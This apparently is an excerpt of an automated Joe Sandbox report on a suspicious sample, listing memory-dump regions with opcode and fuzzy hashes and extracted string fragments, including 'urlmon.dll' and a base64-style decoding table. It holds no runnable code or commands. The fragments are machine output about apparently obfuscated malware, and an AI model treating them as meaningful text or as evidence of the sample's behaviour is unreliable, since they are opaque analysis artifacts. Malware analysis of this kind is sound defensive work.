                                                                                                        • Instruction Fuzzy Hash: E8114CB1A44348AFEB20EB68DC41FEF7BACDF85615F004509FD286B280D6757915CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd234d9c7750ad72d3e711084267d3429c2d9cf210726a5b2193cd37245503d2
                                                                                                        • Instruction ID: d1d856571736947384b43b7cb4556d4216dae655e4eb23a3fea812a281e269a3
                                                                                                        • Opcode Fuzzy Hash: dd234d9c7750ad72d3e711084267d3429c2d9cf210726a5b2193cd37245503d2
                                                                                                        • Instruction Fuzzy Hash: EE21F1F6D01219AF9F00DFA9D8419EFB7F9EF48215F14465AE915E7200E770AA04CFA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a1c6a783601ab8c83d8ca271c2313478de2960171d64b133c0188f3d1af880bc
                                                                                                        • Instruction ID: d64149eabca0818565f5371024263163c8e47b558014b7cae19f8f2db6984bf9
                                                                                                        • Opcode Fuzzy Hash: a1c6a783601ab8c83d8ca271c2313478de2960171d64b133c0188f3d1af880bc
                                                                                                        • Instruction Fuzzy Hash: D321F4F6D01218AF9F00DF99D9419EFBBF9EF88210F14425AE919E7200E7716A05CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c9913a80b96fa5c571731b646c582ccaaabc0803a115ac40e267f1b348eaffa2
                                                                                                        • Instruction ID: c22ff7c2520b0e7e1ecb9417b096618953d479598bb8e8773d7fca887e873670
                                                                                                        • Opcode Fuzzy Hash: c9913a80b96fa5c571731b646c582ccaaabc0803a115ac40e267f1b348eaffa2
                                                                                                        • Instruction Fuzzy Hash: 4B117C71A00308AFEB10EA58DC41FEF77A8EF85305F004549FD186B240D7B47910CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 34f7005628e5b7193a18477d2fe65d11baee78c739b6347420c58b3b972b2aaa
                                                                                                        • Instruction ID: c7433277e2733dd621b0a6764c352954dea618065de96c8981512867bb3b89b6
                                                                                                        • Opcode Fuzzy Hash: 34f7005628e5b7193a18477d2fe65d11baee78c739b6347420c58b3b972b2aaa
                                                                                                        • Instruction Fuzzy Hash: 9411E5F6D0121CAFDB00DFA9D8419EFBBF9EF48610F14455AE919E7240E7716A05CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ec32b85877a10d89662cf078245efc92d3bcdccc877a4a589c22b5bc3301bd05
                                                                                                        • Instruction ID: c418469440858e2b34e1f27d560626d5ef1b26f263ad434df716d7ed9b27f14c
                                                                                                        • Opcode Fuzzy Hash: ec32b85877a10d89662cf078245efc92d3bcdccc877a4a589c22b5bc3301bd05
                                                                                                        • Instruction Fuzzy Hash: 431103F6D01218AFDF00DFE9D8409EEBBF9EF48215F04456AE919E7200E7706A05CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2fafd1e574752d87498d0958dae20a3e1132f3d3ebf2ab8e12ba98caf357c127
                                                                                                        • Instruction ID: ae8f214914b2355acb08ef16b3ef306b11cc95b10e252ca6c3185ec8c695b7b4
                                                                                                        • Opcode Fuzzy Hash: 2fafd1e574752d87498d0958dae20a3e1132f3d3ebf2ab8e12ba98caf357c127
                                                                                                        • Instruction Fuzzy Hash: E00180B6A002283BEB14EAA4DC46DFFB36CDF45214F000256FD2897250FA70BA558AE1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ba1fff015b4f49a5aafa33da881f0307f7411c73ddb1281265ec4b89e79d0178
                                                                                                        • Instruction ID: fd4a2f7be9721354008c7b9e9aa7344e56132ffb2af431a4f28090a29aee03de
                                                                                                        • Opcode Fuzzy Hash: ba1fff015b4f49a5aafa33da881f0307f7411c73ddb1281265ec4b89e79d0178
                                                                                                        • Instruction Fuzzy Hash: EA0197B1C21229AF8B40CFADD8845DDBFF8FB09A21B10865BE868E7200D37196518FD4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
                                                                                                        • Instruction ID: 88f9a5e04c1b6d11d4947c8a136c19b39c1733be0a1cfd4b16b3d958a0501438
                                                                                                        • Opcode Fuzzy Hash: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
                                                                                                        • Instruction Fuzzy Hash: 99018CB2244609BBDB44DE99DC80EEB77ADEF8D715F508209BA19E3241D630FC518BA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9208d3da19233994d424c3afff2543600223c3c37949334af8f3bacb67fcc012
                                                                                                        • Instruction ID: c2c0746805f3c83954483a92ede487a86aa6e8c7cd1950908d3c7d3c1823ad21
                                                                                                        • Opcode Fuzzy Hash: 9208d3da19233994d424c3afff2543600223c3c37949334af8f3bacb67fcc012
                                                                                                        • Instruction Fuzzy Hash: 89F082B36142166BE7105A6EAC41BC6BB9CEB85335F245222FD1886251E772F45187A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8924cf88bad9422fc18bf1f57789eb07afaf3bd383e4b8d5917ecef74d87e778
                                                                                                        • Instruction ID: e99a404a3bc94b4419585c8e3be6c47745309106fe5270e5fca34869ed5deba2
                                                                                                        • Opcode Fuzzy Hash: 8924cf88bad9422fc18bf1f57789eb07afaf3bd383e4b8d5917ecef74d87e778
                                                                                                        • Instruction Fuzzy Hash: AEF062619002187EEB10EBE1DC05EEEB778DF88215F104285EC0863150E770BD448F95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d2ef3091919b25f6fa819f84b1a155381d9f4f4b135b5edac85c36048870f971
                                                                                                        • Instruction ID: 58f481d828329452c7e92cab6ec307224ad59b8016689264aef41032e22c0e4b
                                                                                                        • Opcode Fuzzy Hash: d2ef3091919b25f6fa819f84b1a155381d9f4f4b135b5edac85c36048870f971
                                                                                                        • Instruction Fuzzy Hash: 1FF01CB66402097FDB10EE99DC81E9B77ADEFC9721F008119BD18A7241D670B9118BB0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction ID: 9f76803530d9890ffeb5b30e83802331a0418124dbe6386d73e27f8d47c33801
                                                                                                        • Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction Fuzzy Hash: 0FE065B2600208BFEA10EE59EC45FDB77ACEFC9715F004009F918A7241D670B9108BB5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e844169f80565f97cc18df499238d2eebe4e5d134608ec7d98d41ad2a49e24fa
                                                                                                        • Instruction ID: cebbd61890e93939405718ca6a69b577fb15b9bf7aa409ee2ae8cb3dc5b37c84
                                                                                                        • Opcode Fuzzy Hash: e844169f80565f97cc18df499238d2eebe4e5d134608ec7d98d41ad2a49e24fa
                                                                                                        • Instruction Fuzzy Hash: 59F08271805208EBDB14DF64D841BDDBBB8EB44320F2087AEEC259B280E734A7509791
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 566983493f3b0ad038004870b7e3d902811479f30a7aef9b7590a4c5ec5d040b
                                                                                                        • Instruction ID: 81080fcfd4ad2661da365906905e4816f8b2a0ba341d856a0c96d6fa9f7802ea
                                                                                                        • Opcode Fuzzy Hash: 566983493f3b0ad038004870b7e3d902811479f30a7aef9b7590a4c5ec5d040b
                                                                                                        • Instruction Fuzzy Hash: 2FE0867364026877D62066999C0AFABB76CDFC5F60F090064FE289B351E574BA0482E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7a8a2f41192848a2a9c7c288ba1b486081d6e8814e3e5f8f3845d95ba6deab24
                                                                                                        • Instruction ID: 3ea8ac60f433e560bf23b5666805dbdb4b537d29e363ecc400437e086925636c
                                                                                                        • Opcode Fuzzy Hash: 7a8a2f41192848a2a9c7c288ba1b486081d6e8814e3e5f8f3845d95ba6deab24
                                                                                                        • Instruction Fuzzy Hash: B9F02270815108ABEB08CF64E841FEDBBB8DF04320F2083AEEC19CB680E334A7508790
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ec153441bb58b225afd330b41f35dcfaf5457d31c716e3d19c2cdcccef337cd3
                                                                                                        • Instruction ID: af2b11ea46c32cea721cc419a2caebc240651e24db0827f6c0e37811394816fc
                                                                                                        • Opcode Fuzzy Hash: ec153441bb58b225afd330b41f35dcfaf5457d31c716e3d19c2cdcccef337cd3
                                                                                                        • Instruction Fuzzy Hash: 79E020734041166BC710495E5C404CAFB8CEB862353151221E85877161D731E401C7E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction ID: e3e8b69a0fd9adf8f42b7ae7fa072f1083226cf720d43f7531fbe79077a9fab0
                                                                                                        • Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction Fuzzy Hash: 8CE08C766402047BE620FA5AEC01FEB7B6CDFC5725F008015FE18A7281C675B91087B4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4162936515.0000000006BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6ba0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: /$0$?$D$K5$Lt$Mu$XW$^$^[$v$z$z4$}$'$5z4$w
                                                                                                        • API String ID: 0-2045270831
                                                                                                        • Opcode ID: b058a30b475f30a32733040978c3f33ac0ef5a7930d4b137693667a3b197e5dd
                                                                                                        • Instruction ID: e274ed11aee2f31c3c77550306fc8a2935310aab9522d926303282779585bad6
                                                                                                        • Opcode Fuzzy Hash: b058a30b475f30a32733040978c3f33ac0ef5a7930d4b137693667a3b197e5dd
                                                                                                        • Instruction Fuzzy Hash: BCF1BFB4D05229CFEB64CF95C994BEDBBB1BF44308F208199C0196B382D7755A89CF80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4162936515.0000000006BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6ba0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7f64e5e87d7b25d71b2bb9350c822624079599ad616879921764924f8e9bb43c
                                                                                                        • Instruction ID: 417d1a8c8fe0abaa73cbe6ed3b72ad0418410716a8440a302744e7988dd8b619
                                                                                                        • Opcode Fuzzy Hash: 7f64e5e87d7b25d71b2bb9350c822624079599ad616879921764924f8e9bb43c
                                                                                                        • Instruction Fuzzy Hash: ABB00117FD701A0248645CAE78455B6E374DB87476E543AB7EE0DF3A005802D4260A9D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                        • API String ID: 0-3248090998
                                                                                                        • Opcode ID: e4b94bcf6f0a5a934dc8402b1c1e11f27f1be6721839eef38cb2b0102463f954
                                                                                                        • Instruction ID: e43ae3d98c47aff41328bcaa64fd0cfd4f512658fcb1f0cc88a2490a1e9c8c10
                                                                                                        • Opcode Fuzzy Hash: e4b94bcf6f0a5a934dc8402b1c1e11f27f1be6721839eef38cb2b0102463f954
                                                                                                        • Instruction Fuzzy Hash: A3910EF09052A88ACB118F55A5603DFBF71BBC5204F1581E9C6AA7B243C3BE4E85DF90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                        • API String ID: 0-3248090998
                                                                                                        • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                        • Instruction ID: 4ec8acbbc04b90b9acf591de17f3abd0747df6a9d705c306bc8d0b7fa95dc9f8
                                                                                                        • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                        • Instruction Fuzzy Hash: 83911FF09052A88ACB118F55A4603DFBF71BBC5204F1581E9C6AA7B243C3BE5E85DF90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "$#$($($+$-$-O$1$8L$:$:$<V$?%$C$Pf$T$WA$]$^$b$c}$d$t$v"$vO$y$,$6
                                                                                                        • API String ID: 0-2981804867
                                                                                                        • Opcode ID: 65855bd3f5270462263d0095853c804422fc45928e90bf9908ba830a6fc03151
                                                                                                        • Instruction ID: 8a757af4dbca82f92023f6746c58b859adf98305efcf776c0997f8aa23b42bc9
                                                                                                        • Opcode Fuzzy Hash: 65855bd3f5270462263d0095853c804422fc45928e90bf9908ba830a6fc03151
                                                                                                        • Instruction Fuzzy Hash: 06B124B0D0566DCBEB64CF81C9987DEBBB1BB45308F5081D9C5583B281C7BA1A89CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                        • API String ID: 0-1002149817
                                                                                                        • Opcode ID: 076262697bb051ce7f8e3637e633b9c05d2f1f614bfebe7c19137e4cf6c14f31
                                                                                                        • Instruction ID: 89f7df97026d1d0f85c490f0f9b05e45b2f8fee75e05ecbf969fb6386d2565cf
                                                                                                        • Opcode Fuzzy Hash: 076262697bb051ce7f8e3637e633b9c05d2f1f614bfebe7c19137e4cf6c14f31
                                                                                                        • Instruction Fuzzy Hash: 72C120B1D00268AEEF60DFA4CC44BEEBBB8AF45304F0091D9D54CAB251D7B55A88CF61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                        • API String ID: 0-3236418099
                                                                                                        • Opcode ID: 753d995bcf042386a9600f67af8097f065c711b66e1cb6aa5f7e704dade9c488
                                                                                                        • Instruction ID: e8068e8727040a18588f101b37042909e4bffacc90d68679d44fd6286a5aecb4
                                                                                                        • Opcode Fuzzy Hash: 753d995bcf042386a9600f67af8097f065c711b66e1cb6aa5f7e704dade9c488
                                                                                                        • Instruction Fuzzy Hash: A89130B1900218AAEB64EF949C41FEEB7BCAF45304F444199EA0CA6150EB757B89CF61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $.$@4>J$F$P$e$i$l$m$o$o$r$s$x
                                                                                                        • API String ID: 0-1771628126
                                                                                                        • Opcode ID: de1dd7805bd27e6cb83f1f8a57904f85125e780a25360f4459898ced697aa1e2
                                                                                                        • Instruction ID: 6d3193e762030abd89973ca7475154f1042c501763f20e511e136cd72ba65b11
                                                                                                        • Opcode Fuzzy Hash: de1dd7805bd27e6cb83f1f8a57904f85125e780a25360f4459898ced697aa1e2
                                                                                                        • Instruction Fuzzy Hash: A37120B1C11218AAEB65DF94CC41FEEB7BCAF44704F009599E908AB150EB747B48CFA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: G)3G$G0(0$QIU\$QIWI$QIWIWIU$QIWN$QS\G$RIWG$UQIW$VWVG$WIU$WVWW$g
                                                                                                        • API String ID: 0-4202404308
                                                                                                        • Opcode ID: 84631871a8bfca7b35ef2bf1cf9bb94da5960d41403a41f65b4c89fc05fc5e81
                                                                                                        • Instruction ID: d699297357a963653cd747009944e63c7b0ea1c02553ee3a59d949b3f41f05d7
                                                                                                        • Opcode Fuzzy Hash: 84631871a8bfca7b35ef2bf1cf9bb94da5960d41403a41f65b4c89fc05fc5e81
                                                                                                        • Instruction Fuzzy Hash: 3511EFB0C04289AECB00DFD2D9995DEFFB4BF04708F208458D9683E640C3715A8ACF85
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                        • API String ID: 0-685823316
                                                                                                        • Opcode ID: 2a82cc5933fc53c7fc8022c985daabc2155db0a9707cb2b1607c13d15155f277
                                                                                                        • Instruction ID: 32bb1d4b3ff513ad811ee2272795c9fb2d11aaf218cb4bfd01d31696b8d1e64b
                                                                                                        • Opcode Fuzzy Hash: 2a82cc5933fc53c7fc8022c985daabc2155db0a9707cb2b1607c13d15155f277
                                                                                                        • Instruction Fuzzy Hash: 393130B1D51218AAEF50DFD4CC85BEEBBB9BF04704F14815CEA147A180DBB56648CBA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                        • API String ID: 0-685823316
                                                                                                        • Opcode ID: bca782ef33a349a295768a06c1924f4b48cae2fac349f7f944941cba404c76ee
                                                                                                        • Instruction ID: be293cc467979f9068f4901f9d7df42b999a5f390de7e4c4585cf15e97934a4a
                                                                                                        • Opcode Fuzzy Hash: bca782ef33a349a295768a06c1924f4b48cae2fac349f7f944941cba404c76ee
                                                                                                        • Instruction Fuzzy Hash: D02173B1D51218AAEF50DFD4CC45FEEB7B9AF08704F00815CEA18BA180DBB526488FA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                        • API String ID: 0-2304485323
                                                                                                        • Opcode ID: 8874caca2db7fca1e61eb906842f0709ad54422f35bbc7759f3ebc55c2f093cb
                                                                                                        • Instruction ID: f8f4d2974883cdb941beea02216f70c2b3a6433564a5d96274f481a253c794b7
                                                                                                        • Opcode Fuzzy Hash: 8874caca2db7fca1e61eb906842f0709ad54422f35bbc7759f3ebc55c2f093cb
                                                                                                        • Instruction Fuzzy Hash: 54D1D7B2A10309ABEB50EFE4C881FEEB7B8AF49314F445519E519E7240E778B905CB61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                                                        • API String ID: 0-620024284
                                                                                                        • Opcode ID: f5e0583fc2d84f72b15f30f7805fb963ff555d7b1f68539aeef7f1abcea791cc
                                                                                                        • Instruction ID: 4f7f3b0612ab012d8ae8cdc266bf6b775e056319731f873218c25456f053f532
                                                                                                        • Opcode Fuzzy Hash: f5e0583fc2d84f72b15f30f7805fb963ff555d7b1f68539aeef7f1abcea791cc
                                                                                                        • Instruction Fuzzy Hash: 724178B5810218BAEF21EBA0DC40FEEB77CAF54304F409599A90DA7150EBB5774D8FA1
                                                                                                        Strings
